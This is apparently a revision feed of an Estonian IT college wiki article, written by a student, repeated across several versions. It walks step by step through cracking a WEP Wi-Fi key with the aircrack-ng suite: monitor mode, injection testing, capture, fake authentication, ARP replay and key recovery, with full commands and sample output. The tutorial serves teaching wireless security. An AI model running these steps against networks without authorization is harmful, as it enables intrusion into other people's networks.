Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89287</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89287"/>
		<updated>2015-05-25T19:15:46Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Versioonide ajalugu */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
* airdecap-ng - WEP/WPA/WPA2 püütud failide dekrüpteerimiseks &lt;br /&gt;
&lt;br /&gt;
==Süntaks==&lt;br /&gt;
&lt;br /&gt;
aircrack-ng süntaks näeb välja järgmine:&lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng [võti] &amp;lt;püütud fail(id)&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nimekirja võtmetele leiab [http://www.aircrack-ng.org/doku.php?id=aircrack-ng&amp;amp;DokuWiki=10da6035d1e79b0fb572490ff22d4b53#usage SIIT!]&lt;br /&gt;
&lt;br /&gt;
=Installeerimine=&lt;br /&gt;
&lt;br /&gt;
Uuendame repositooriumi:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get update&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kasutame apt-i utiliiti, et paigaldada Aircrack-ng komplekt:&lt;br /&gt;
&amp;lt;pre&amp;gt;sudo apt-get install aircrack-ng&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=WEP võtme murdmine=&lt;br /&gt;
&lt;br /&gt;
Alustuseks on soovitav üles märkida järgmised andmed, sest neid läheb meil ka edaspidi vaja: &lt;br /&gt;
* Arvuti MAC aadress, mis jooksutab aircrack-ng&#039;d: 00:0F:B5:88:AC:82&lt;br /&gt;
* BSSID (pääsupunkti MAC aadress): 00:14:6C:7E:40:80&lt;br /&gt;
* ESSID (võrgu nimi): teddy&lt;br /&gt;
* Pääsupunkti kanal: 9&lt;br /&gt;
* Raadiovõrgu liides (ingl. k Wireless interface): ath0&lt;br /&gt;
&lt;br /&gt;
==Eesmärk==&lt;br /&gt;
Eesmärgiks on püüda kinni võimalikult palju initsialiseerimise vektoreid ehk IV-sid (ingl. k initialization vectors). Normaalse võrguliikluse (ingl. k network traffic) juures ei genereerita neid tavaliselt just väga kiiresti. Kuna keegi ei suuda meist aga pikalt kannatlik olla, siis kasutatakse siinkohal protsessi kiirendamiseks „süstimise“ (ingl. k injection) tehnikat. Sellisel juhul saadab pääsupunkt valitud pakette massiliselt uuesti ja uuesti, et oleks võimalik kinni püüda palju IV-sid võimalikult lühikese aja jooksul. Kui ka see on õnnestunud, siis saame kogutud IV-sid kasutada WEP võtme lahti murdmiseks.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
==Lühikesed tegevussammud==&lt;br /&gt;
Lühidalt sammudest, mida tegema asume:&lt;br /&gt;
1. Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi (ingl. k monitor mode)&amp;lt;br&amp;gt;&lt;br /&gt;
2. Testime „süstimise“ suutlikkust pääsupunktile &amp;lt;br&amp;gt;&lt;br /&gt;
3. Panna tööle airodump-ng pääsupunkti kanalil koos BSSID filtriga, et koguda IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
4. Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga &amp;lt;br&amp;gt;&lt;br /&gt;
5. Panna tööle aireplay-ng ARP päringute (ingl. k request) kordusrežiimis (ingl. k replay mode), et “süstida” pakette&amp;lt;br&amp;gt;&lt;br /&gt;
6. Kasutada aircrack-ng&#039;d salasõna lahti murdmiseks, kasutades seejuures ära kogutud IV-sid&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==Näide WEP võtme lahti murdmise protsessist==&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Samm1: Seadistame ennast kindlale pääsupunkti kanalile kuulamisrežiimi&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Esmalt tuleb avada konsooli aken ning WiFi võrgukaart seadistada kuulamisrežiimi seisundisse. Selles režiimis kuulab kaart igat paketti (tavaliselt kuulab kaart vaid meile adresseeritud pakette). Igat paketti kuulates on võimalik valida välja mõned neist, et viia läbi „süstimine“.&lt;br /&gt;
 &lt;br /&gt;
Peata ath0 liidese:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng stop ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;Interface       Chipset         Driver&lt;br /&gt;
&lt;br /&gt;
wifi0           Atheros         madwifi-ng&lt;br /&gt;
ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli, kas kõik athX liidesed on ikka suletud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kui siiski vastusest tuli välja veel mõni athX liides, siis tuleb ka need ükshaaval &#039;&#039;&#039;airmon-ng stop athX&#039;&#039;&#039; käsuga sulgeda.&lt;br /&gt;
&lt;br /&gt;
Seadista võrgukaart 9-ndale kanalile kuulamisrežiimi:&lt;br /&gt;
&amp;lt;pre&amp;gt;airmon-ng start wifi0 9&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Eelmises käsus kasutasime “wifi0”-i varasemalt üles märgitud võrguliidese “ath0” asemel, seda seetõttu, et kasutuses on madwifi-ng draiver (nähtav airmon-ng stop ath0 käsu tulemuses). Juhul, kui kasutusel on mõni muu draiver, kasuta raaiovõrgu liidese nime, näiteks “wlan0” või “rausb0”.&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt; Interface       Chipset         Driver&lt;br /&gt;
 &lt;br /&gt;
 wifi0           Atheros         madwifi-ng&lt;br /&gt;
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! “ath0” liides on märgitud nüüd kuulamisrežiimi.&lt;br /&gt;
&lt;br /&gt;
Veendumaks, et liides on korrektselt üles seatud:&lt;br /&gt;
&amp;lt;pre&amp;gt;iwconfig&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;lo        no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
wifi0     no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
eth0      no wireless extensions.&lt;br /&gt;
&lt;br /&gt;
ath0      IEEE 802.11g  ESSID:&amp;quot;&amp;quot;  Nickname:&amp;quot;&amp;quot;&lt;br /&gt;
       Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   &lt;br /&gt;
       Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  &lt;br /&gt;
       Retry:off   RTS thr:off   Fragment thr:off&lt;br /&gt;
       Encryption key:off&lt;br /&gt;
       Power Management:off&lt;br /&gt;
       Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm&lt;br /&gt;
       Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
       Tx excessive retries:0  Invalid misc:0   Missed beacon:0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Kontrolli: Mode = Monitor; 2.452GHz = Channel 9; aircrack-ng&#039;d jooksutava arvuti MAC, mis on nähtav vaid madwifi-ng draiverite puhul, muidu mitte!&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 2: Testime „süstimise“ suutlikkust pääsupunktile&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Selle sammu eesmärgiks on selgitada välja, kas ollakse piisavalt lähedal pääsupunktile, et sinna pakette „süstida“.&lt;br /&gt;
 &lt;br /&gt;
Sisesta käsureale:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -9 -e teddy -a 00:14:6C:7E:40:80  ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-9 - “süstimise” test&lt;br /&gt;
-e teddy – raadiovõrgu nimi&lt;br /&gt;
-a 00:14:6C:7E:40:80 – pääsupunkti MAC aadress&lt;br /&gt;
ath0 – raadiovõrgu liides&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;09:23:35  Waiting for beacon frame (BSSID: 00:14:6C:7E:40:80) on channel 9&lt;br /&gt;
09:23:35  Trying broadcast probe requests...&lt;br /&gt;
09:23:35  Injection is working!&lt;br /&gt;
09:23:37  Found 1 AP &lt;br /&gt;
&lt;br /&gt;
09:23:37  Trying directed probe requests...&lt;br /&gt;
09:23:37  00:14:6C:7E:40:80 - channel: 9 - &#039;teddy&#039;&lt;br /&gt;
09:23:39  Ping (min/avg/max): 1.827ms/68.145ms/111.610ms Power: 33.73&lt;br /&gt;
09:23:39  30/30: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pane tähele! Viimane rida on eriti tähtis! Ideaalis peaks tulemus olema 100% või mõni muu väga kõrge protsent. Kui protsent on madal, siis ollakse pääsupunktist kas liiga kaugel või sellele liigagi lähedal. 0% märgib “süstimise” mitte toimimist ning sellisel juhul tuleks paigata (ingl. k patch) või kasutada hoopis muid draivereid.  &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 3: Avada airodump-ng pakettide püüdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta: &lt;br /&gt;
&amp;lt;pre&amp;gt;airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgituseks:&lt;br /&gt;
-c 9 – raadiovõrgu kanal&lt;br /&gt;
--bssid 00:14:6C:7E:40:80 – pääsupunkti MAC aadressi ees olev võti ütleb, et antud aadress ei ole seotud ühegi pääsupunktiga, vaid otsib üht, kuhu ühendud&lt;br /&gt;
-w output – võtmele järgneb faili nime prefiks, mis edaspidi sisaldab IV-sid&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Hiljem, mil “süstimine” leiab aset, võib ekraanilt lugeda midagi sellist:&lt;br /&gt;
&amp;lt;pre&amp;gt;CH  9 ][ Elapsed: 8 mins ][ 2007-03-21 19:25 &lt;br /&gt;
                                                                                                              &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80   42 100     5240   178307  338   9  54  WEP  WEP         teddy                           &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 BSSID              STATION            PWR  Lost  Packets  Probes                                             &lt;br /&gt;
                                                                                                            &lt;br /&gt;
 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  &amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 4: Kasutame aireplay-ng&#039;d vale autentimise läbiviimiseks pääsupunktiga&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;Selgitus:&lt;br /&gt;
-1 – võlts autentimine&lt;br /&gt;
0 – kordusühendus(t)e aeg sekundites&lt;br /&gt;
-h 00:0F:B5:88:AC:82 – meie võrgukaardi MAC aadress&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Õnnestumise korral on tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;18:18:20  Sending Authentication Request&lt;br /&gt;
18:18:20  Authentication successful&lt;br /&gt;
18:18:20  Sending Association Request&lt;br /&gt;
18:18:20  Association successful :-)&lt;br /&gt;
Ebaõnnestumise korral on tulemus: &lt;br /&gt;
8:28:02  Sending Authentication Request&lt;br /&gt;
18:28:02  Authentication successful&lt;br /&gt;
18:28:02  Sending Association Request&lt;br /&gt;
18:28:02  Association successful :-)&lt;br /&gt;
18:28:02  Got a deauthentication packet!&lt;br /&gt;
18:28:05  Sending Authentication Request&lt;br /&gt;
18:28:05  Authentication successful&lt;br /&gt;
18:28:05  Sending Association Request&lt;br /&gt;
18:28:10  Sending Authentication Request&lt;br /&gt;
18:28:10  Authentication successful&lt;br /&gt;
18:28:10  Sending Association Request&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 5: Ava aireplay-ng ARP päringute kordusrežiimis&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Järgnevalt kasutatakse aireplay-ng’d meetodil, kus on võimalik kuulata ARP päringuid, et neid siis võrku tagasi „süstida“. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken ja sisesta:&lt;br /&gt;
&amp;lt;pre&amp;gt;aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemus: &lt;br /&gt;
&amp;lt;pre&amp;gt;Saving ARP requests in replay_arp-0321-191525.cap&lt;br /&gt;
You should also start airodump-ng to capture replies.&lt;br /&gt;
Read 629399 packets (got 316283 ARP requests), sent 210955 packets...&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&#039;&#039;&#039;Samm 6: Ava aircrack-ng salasõna lahti murdmiseks&#039;&#039;&#039;&amp;lt;br&amp;gt;&lt;br /&gt;
Viimaks pannakse tööle aircrack-ng, et saada kätte salasõna kogutud IV-de põhjal. &lt;br /&gt;
&lt;br /&gt;
Ava uus konsooliaken: &lt;br /&gt;
&amp;lt;pre&amp;gt;aircrack-ng -b 00:14:6C:7E:40:80 output*.cap&amp;lt;/pre&amp;gt;&lt;br /&gt;
&#039;&#039;&lt;br /&gt;
Selgitus:&lt;br /&gt;
-b 00:14:6C:7E:40:80 – MAC aadress märgib pääsupunkti, mis meile huvi pakub&lt;br /&gt;
output*.cap – märgib kõiki faile, mis algavad sõnaga “output” ning lõppevad “.cap”&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
Tulemus:&lt;br /&gt;
&amp;lt;pre&amp;gt;                             [00:03:06] Tested 674449 keys (got 96610 IVs)&lt;br /&gt;
&lt;br /&gt;
KB    depth   byte(vote)&lt;br /&gt;
 0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) &lt;br /&gt;
 1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) &lt;br /&gt;
 2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) &lt;br /&gt;
 3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) &lt;br /&gt;
&lt;br /&gt;
                      KEY FOUND! [ 12:34:56:78:90 ] &lt;br /&gt;
     Probability: 100%&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Kokkuvõte=&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=Kasutatud kirjandus=&lt;br /&gt;
&amp;lt;references/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Autor=&lt;br /&gt;
&lt;br /&gt;
Kelly Tragel [ISa 21]&amp;lt;br&amp;gt;&lt;br /&gt;
Viimati muudetud: 25.05.2015&lt;br /&gt;
&lt;br /&gt;
=Versioonide ajalugu=&lt;br /&gt;
&lt;br /&gt;
&amp;lt;table border=&amp;quot;1&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Kuupäev &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;th&amp;gt; Versioon &amp;lt;/th&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 25.05.2015 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; 1.0 &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; x &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; x &amp;lt;/td&amp;gt;         &lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; x &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;td&amp;gt; x &amp;lt;/td&amp;gt;&lt;br /&gt;
&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ktragel</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89285</id>
		<title>Aircrack</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Aircrack&amp;diff=89285"/>
		<updated>2015-05-25T19:15:21Z</updated>

		<summary type="html">&lt;p&gt;Ktragel: /* Autor(id) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Sissejuhatus=&lt;br /&gt;
Käesoleva artikli eesmärgiks on tutvustada Aircrack-ng komplekti (sisaldab üle kümne väiksema tööriista) kuuluvat tööriista aircrack-ng. Artikkel hõlmab endas aircrack-ng installatsiooni- ja kasutusjuhendit. &lt;br /&gt;
&lt;br /&gt;
=Eeldused=&lt;br /&gt;
&lt;br /&gt;
* Elementaarne käsurea kasutamisoskus&lt;br /&gt;
* Teadmised WiFi, WEP, WPA/WPA2 kohta&lt;br /&gt;
* Võrgus vähemalt 1 aktiivne klient&lt;br /&gt;
* Ollakse füüsiliselt piisavalt lähedal pääsupunktile (ingl. k Access Point)&lt;br /&gt;
* Soovituslik on toimetada mõne Linuxi distributsiooni peal (ehkki aircrack-ng on konfigureeritav erinevatel platvormidel, ei pruugi kõik funktsionaalsused mitte Linux süsteemidel töötada)&lt;br /&gt;
* aircrack-ng tööle saamise eelduseks on “heaks kiidetud” WiFi adapter (rohkem infot: [http://aircrack-ng.org/doku.php?id=compatible_cards siit] ja [http://aircrack-ng.org/doku.php?id=compatibility_drivers siit])&lt;br /&gt;
&lt;br /&gt;
WiFi adapteri vaatamine:&lt;br /&gt;
&amp;lt;pre&amp;gt;lspci -nn | grep Network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või rohkema informatsiooni saamiseks:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;lshw -class network&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Tulemuseks saame midagi sarnast:&lt;br /&gt;
&amp;lt;pre&amp;gt;02:00.0 Network controller [0280]: Intel Corporation Centrino Advanced-N 6205 [Taylor Peak] [8086:0082] (rev 34)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
või &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;*-network&lt;br /&gt;
       description: Wireless interface&lt;br /&gt;
       product: Centrino Advanced-N 6205 [Taylor Peak]&lt;br /&gt;
       vendor: Intel Corporation&lt;br /&gt;
       physical id: 0&lt;br /&gt;
       bus info: pci@0000:02:00.0&lt;br /&gt;
       logical name: wlan0&lt;br /&gt;
       version: 34&lt;br /&gt;
       serial: 6c:88:14:1d:29:c4&lt;br /&gt;
       width: 64 bits&lt;br /&gt;
       clock: 33MHz&lt;br /&gt;
       capabilities: pm msi pciexpress bus_master cap_list ethernet physical wireless&lt;br /&gt;
       configuration: broadcast=yes driver=iwlwifi driverversion=3.19.0-18-generic firmware=18.168.6.1 ip=192.168.1.93 latency=0 link=yes multicast=yes wireless=IEEE 802.11abgn&lt;br /&gt;
       resources: irq:32 memory:f7d00000-f7d01fff&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;&amp;lt;!-- Warning style viksitud ArchWikist --&amp;gt;div style=&amp;quot;padding: 5px; margin: 0.50em 0; background-color: #FFDDDD; border: thin solid #DDBBBB; overflow: hidden;&amp;quot;&amp;gt;&#039;&#039;&#039;Pane tähele! &#039;&#039;&#039;Antud juhend on koostatud kasutades Ubuntu 15.04 (Vivid Vervet) ja Aircrack-ng 1.2 RC2 versioone. &amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Üldkirjeldus=&lt;br /&gt;
&lt;br /&gt;
aircrack-ng on 802.11 WEP ja WPA/WPA2-PSK võtmete lahtimurdmise programm. Seda tuleb kasutada kombineerides ka teisi Aircrack-ng komplekti kuuluvaid mooduleid/tööriistu:&lt;br /&gt;
* airodump-ng - programm pakettide püüdmiseks &lt;br /&gt;
* aireplay-ng - programm pakettide „süstimiseks“ &lt;br /&gt;
* aircrack-ng - staatiline WEP ja WPA/WPA2-PSK võtmete lahti murdija&lt;br /&gt;
